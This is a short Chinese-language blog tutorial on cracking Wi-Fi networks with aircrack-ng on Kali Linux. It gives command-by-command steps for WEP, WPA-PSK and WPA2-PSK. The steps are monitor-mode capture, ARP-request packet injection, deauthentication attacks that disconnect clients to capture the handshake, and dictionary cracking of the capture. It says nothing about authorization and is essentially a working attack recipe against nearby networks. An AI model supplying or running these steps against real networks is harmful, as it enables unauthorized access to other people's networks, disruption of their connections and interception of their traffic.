使用kali破解无线网络
一.使用Aircrack-ng破解WEP加密无线网络
1.杀掉上次运行的监控网卡
airmon-ng check kill
2.启动无线网卡
ifconfig wlan0 up
3.将无线网卡转换为监控网卡
airmon-ng start wlan0
4.监控附近无线网络
airodump-ng wlan0mon
5.针对频道监控无线网络,并保存监控结果
airodump-ng --ivs –w longas -c 6 wlan0mon
6.对目标AP使用ArpRequest注入攻击
aireplay-ng -3 -b AP的mac -h 客户端的mac wlan0mon
7.打开aircrack-ng,开始破解WEP
aircrack-ng 捕获的ivs/cap文件
注:本步需要至少1万以上的IVS。
二.使用Aircrack-ng破解WPA-PSK加密无线网络
1.杀掉上次运行的监控网卡
airmon-ng check kill
2.启动无线网卡
ifconfig wlan0 up
3.将无线网卡转换为监控网卡
airmon-ng start wlan0
4.监控附近无线网络
airodump-ng wlan0mon
5.针对频道监控无线网络,并保存监控结果
airodump-ng --ivs –w longas -c 6 wlan0mon
6.进行Deauth攻击加速破解过程
aireplay-ng -0(采用deauth攻击模式) 1(攻击次数,可以设置为1-10不等) –a AP的mac -c 客户端的mac wlan0mon
此时回到airodump-ng的界面查看,我们可以看到在右上角出现了“WPA handshake”的提示,这表示获得到了包含WPA-PSK密码的4此握手数据报文,至于后面是目标AP的MAC,这里的AP指的就是要破解的无线路由器。
7.开始破解WPA-PSK。
aircrack-ng -w dic 捕获的cap文件
三.使用Aircrack-ng破解WPA2-PSK加密无线网络
对于启用WPA2-PSK加密的无线网络,其攻击和破解步骤及工具是完全一样的,不同的是,在使用airodump-ng进行无线探测的界面上,会提示为WPA CCMP PSK。
除特别注明外,本站所有文章均为奇妙伞原创,转载请注明出处来自https://qm3.com.cn/post/290.html